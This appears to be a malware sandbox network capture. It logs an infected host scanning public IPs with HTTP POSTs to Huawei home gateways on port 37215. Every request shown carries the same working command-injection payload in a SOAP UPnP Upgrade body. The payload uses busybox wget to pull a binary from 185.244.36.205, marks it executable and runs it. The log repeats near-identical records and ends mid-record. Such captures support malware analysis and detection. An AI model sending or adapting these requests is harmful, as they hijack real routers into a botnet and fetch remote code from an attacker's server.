                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2161192.168.2.1551364156.70.234.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.123313904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2162192.168.2.155855241.184.113.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.125241995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2163192.168.2.153953845.85.181.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.125242949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2164192.168.2.1551748156.99.143.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.125329971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2165192.168.2.154145845.168.176.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.125700951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2166192.168.2.1550932186.211.143.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.126297951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2167192.168.2.1560872197.64.161.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.127274036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2168192.168.2.1551054102.43.205.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.127799034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2169192.168.2.154280645.229.77.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.127801895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2170192.168.2.1540490171.42.237.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.128107071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2171192.168.2.1540484190.220.88.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.128945112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
